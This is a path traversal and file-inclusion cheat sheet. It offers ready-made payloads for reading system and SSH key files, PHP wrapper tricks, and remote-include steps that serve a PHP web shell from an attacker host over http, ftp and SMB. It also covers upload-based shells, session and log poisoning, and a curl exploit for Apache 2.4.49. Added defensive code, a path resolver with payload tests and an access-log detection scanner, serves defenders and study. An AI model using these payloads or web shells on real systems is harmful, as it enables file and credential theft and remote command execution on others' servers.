What is Path Traversal?
Path Traversal (also called Directory Traversal) lets an attacker read arbitrary files on the server that runs an application. Those files may be application code and data, credentials for backend systems, or sensitive operating system files.
In some cases the attacker can also overwrite arbitrary files on the server, changing application data or behaviour and ultimately taking full control of the server.
Methods
Full Path
/etc/passwd
C:/windows/system32/drivers/etc/hosts
Changing Directory (relative traversal)
../../../../../etc/passwd
../../../../../windows/system32/drivers/etc/hosts
Bypassing Filters (....// survives a single, non-recursive strip of ../)
....//....//....//etc/passwd
....//....//....//windows/system32/drivers/etc/hosts
URL Encoding (double-encoded slash)
..%252f..%252f..%252fetc/passwd
..%252f..%252f..%252fwindows/system32/drivers/etc/hosts
Bypassing Base-Directory Checks (expected prefix, then traversal)
/var/www/images/../../../etc/passwd
C:/inetpub/wwwroot/images/../../../../../windows/system32/drivers/etc/hosts
Bypassing Extension Checks (null byte)
../../../etc/passwd%00.png
../../../../../windows/system32/drivers/etc/hosts%00.png
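Every bypass in the list above works against a check that inspects the raw string. The defensive counterpart, added here as an example and not code from the original page, is to decode fully, resolve the path, and then test the resolved result against the base directory. The base directory, the allowed extensions and the file names are assumptions made for the demonstration; the payloads are the ones listed above.

```python
import os
import tempfile
from urllib.parse import unquote

# Extensions the hypothetical image endpoint may serve (assumption).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".gif"}


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, so a double-encoded
    ..%252f collapses to ../ before any check is applied."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many encoding layers")


def safe_resolve(base_dir, user_path):
    """Return the absolute path of user_path inside base_dir, or raise
    ValueError. The check runs on the *resolved* path, so ../, ....//,
    encoded forms and symlinks all fall under one rule: the result must
    stay under base_dir."""
    if not user_path:
        raise ValueError("empty path")
    decoded = fully_decode(user_path)
    if "\x00" in decoded:
        # Null byte: used to cut off an extension appended by the server
        raise ValueError("null byte in path")
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/") or (len(decoded) > 1 and decoded[1] == ":"):
        # Absolute POSIX or drive-letter paths are never legitimate input here
        raise ValueError("absolute path not allowed")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, decoded))
    # realpath has normalised '..' and followed symlinks; commonpath (not
    # startswith) avoids the /images vs /images-old prefix confusion.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError("path escapes base directory")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return candidate


# Payloads from the cheat sheet plus a symlink case and two benign names (constructed).
PAYLOADS = [
    "/etc/passwd",
    "../../../../../etc/passwd",
    "....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc/passwd",
    "/var/www/images/../../../etc/passwd",
    "../../../etc/passwd%00.png",
    "link.png",      # symlink pointing outside base, created in run_checks
    "logo.png",
    "icons/ok.gif",
]


def run_checks():
    """Resolve each payload against a throwaway base directory and report
    which are accepted (True) and which are rejected (False)."""
    base = tempfile.mkdtemp(prefix="images-")
    payloads = list(PAYLOADS)
    try:
        os.symlink("/etc/passwd", os.path.join(base, "link.png"))
    except OSError:
        payloads.remove("link.png")  # no symlink support: skip that case
    results = {}
    for p in payloads:
        try:
            safe_resolve(base, p)
            results[p] = True
        except ValueError:
            results[p] = False
    return results


if __name__ == "__main__":
    for payload, accepted in run_checks().items():
        print(f"{'ACCEPT' if accepted else 'REJECT':6} {payload!r}")
```

This guards a file-read endpoint. For an include-style sink (`include($_GET['page'])`) path checks are the wrong tool, because wrapper inputs such as php://filter are not paths at all; there the control is an allowlist that maps page names to fixed files.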
PHP Wrappers
http://example.com?page=php://filter/convert.base64-encode/resource=/etc/passwd
http://example.com?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
http://example.com?page=php://input&cmd=id # POST data <?php system($_GET["cmd"]); ?>
http://example.com?page=expect://id
RFI
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python -m http.server 80
http://example.com?page=http://192.168.1.2/shell.php&cmd=ls
python -m pyftpdlib -p 21
http://example.com?page=ftp://192.168.1.2/shell.php&cmd=id
impacket-smbserver -smb2support share .
http://example.com?page=\\192.168.1.2\share\shell.php&cmd=whoami
GIF Upload LFI
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
http://example.com?page=./profile_images/shell.gif&cmd=id
Zip Upload LFI
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
http://example.com?page=zip://./profile_images/shell.jpg%23shell.php&cmd=id
Phar Upload
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
http://example.com?page=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
PHP Log Poisoning
# PHP Session Poisoning
http://example.com?page=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
http://example.com?page=C:\Windows\Temp\sess_nhhv8i0o6ua4g88bkdl9u1fdsd
http://example.com?page=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
http://example.com?page=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# PHP Log Poisoning
http://example.com?page=/var/log/apache2/access.log
http://example.com?page=/var/log/nginx/access.log
http://example.com?page=C:\nginx\log\access.log
http://example.com?page=C:\xampp\apache\logs\access.log
User-Agent: <?php system($_GET['cmd']); ?>
http://example.com?page=/var/log/apache2/access.log&cmd=id
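The wrapper, RFI, upload and log-poisoning sections above all leave characteristic traces in the web server's access log: wrapper schemes in the page parameter, remote URLs as parameter values, traversal sequences (often encoded), null bytes, references to log or session files, and PHP tags in the User-Agent. The scanner below is an added example for the detection side, not code from the original page; it assumes a combined-format access log and the constructed sample lines embedded in it use documentation IP ranges.

```python
import re
from urllib.parse import unquote

# Apache/nginx combined log format (assumption: the server writes this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators derived from the payload families on this page; applied to the
# fully decoded query string so encoded variants are caught too.
QUERY_PATTERNS = {
    "traversal": re.compile(r"\.{2,}[/\\]"),                           # ../  ..\  ....//
    "php_wrapper": re.compile(r"\b(php|data|expect|zip|phar|glob)://", re.I),
    "remote_include": re.compile(r"=(https?|ftp)://|=\\\\", re.I),     # RFI over http/ftp/smb
    "null_byte": re.compile("\x00"),
    "log_or_session": re.compile(r"/var/log/|/var/lib/php/sessions/|sess_[0-9a-z]+|access\.log", re.I),
    "php_tag": re.compile(r"<\?php", re.I),                            # session poisoning via parameter
}
UA_PHP_TAG = re.compile(r"<\?php", re.I)                               # log poisoning via User-Agent


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so %252f and %2e%2e are seen as ../"""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    return value


def analyze_request(target, user_agent):
    """Return the set of indicator names that fire for one request."""
    query = fully_decode(target).partition("?")[2]
    tags = {name for name, rx in QUERY_PATTERNS.items() if rx.search(query)}
    if UA_PHP_TAG.search(user_agent):
        tags.add("ua_php_tag")
    return tags


def scan_log(text):
    """Parse combined-format log lines and return the suspicious ones."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = analyze_request(m["target"], m["ua"])
        if tags:
            hits.append({"ip": m["ip"], "target": m["target"], "tags": sorted(tags)})
    return hits


# Constructed sample log: one benign request followed by the payload families
# from this page (IPs are documentation ranges, not real hosts).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=..%252f..%252f..%252fetc/passwd HTTP/1.1" 200 1831 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2440 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?page=http://192.0.2.10/shell.php&cmd=id HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.9 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 98000 "-" "<?php system($_GET['cmd']); ?>"
203.0.113.11 - - [10/Oct/2023:13:56:30 +0000] "GET /index.php?page=....//....//....//etc/passwd%00.png HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], ",".join(hit["tags"]), hit["target"])
```

The 403 on the last line shows why status codes alone are a poor filter: the attempt was blocked but is still worth alerting on, and the 200 with a 98000-byte body on the access.log request is exactly the size anomaly a successful log-file inclusion produces.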
LFI Wordlists
Linux: https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux
Win: https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows
Apache HTTP Server 2.4.49
curl -s --path-as-is "http://192.168.199.245/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
/etc/passwd
/root/.ssh/id_rsa
/root/.ssh/id_ecdsa
Tools
Burp Suite Active Scan
Resources
PortSwigger Academy: https://portswigger.net/web-security/file-path-traversal